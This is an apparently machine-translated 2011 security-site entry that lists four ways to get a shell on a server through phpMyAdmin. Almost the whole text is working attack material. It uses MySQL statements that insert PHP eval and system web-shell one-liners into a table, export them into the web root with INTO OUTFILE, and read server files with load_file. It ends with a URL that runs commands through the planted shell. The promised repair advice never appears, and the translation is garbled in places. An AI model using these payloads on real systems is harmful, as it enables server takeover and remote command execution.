phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net

2011-07-05T00:00:00
ID MYHACK58:62201131142
Type myhack58
Reporter 佚名
Modified 2011-07-05T00:00:00

Description

Method one:

CREATE TABLE mysql.study (7on TEXT NOT NULL );

INSERT INTO mysql.study (7on )VALUES ('<? php @eval($_POST[7on])?& gt;');

SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';

---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到 E:/wamp/www/7.php

Word connection password: 7on

Method two:

Read file contents: select load_file('E:/xamp/www/s.php');

Write the word: select '<? php @eval($_POST[cmd])?& gt;'INTO OUTFILE 'E:/xamp/www/study.php'

cmd execute permissions: select '<? php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?& gt;' INTO OUTFILE 'E:/xamp/www/study.php'

Method three:

JhackJ version of PHPmyadmin get shell

Create TABLE study (cmd text NOT NULL);

Insert INTO study (cmd) VALUES('<? php eval($_POST[cmd])?& gt;');

select cmd from study into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS study;

<? php eval($_POST[cmd])?& gt;

--------------------------------------------------------------------------------

<? php @eval($_POST[cmd])?& gt;

CREATE TABLE study(cmd text NOT NULL );# MySQL returns the query result is empty(i.e. zero rows).

INSERT INTO study( cmd ) VALUES ('<? php eval($_POST[cmd])?& gt;');# affected column count: 1

SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# affected column count: 1

DROP TABLE IF EXISTS study;# MySQL returns the query result is empty(i.e. zero rows).

Method four:

select load_file('E:/xamp/www/study.php');

select '<? php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?& gt;' INTO OUTFILE 'E:/xamp/www/study.php'

Then visit the website directory: http://www.2cto.com/study.php?cmd=dir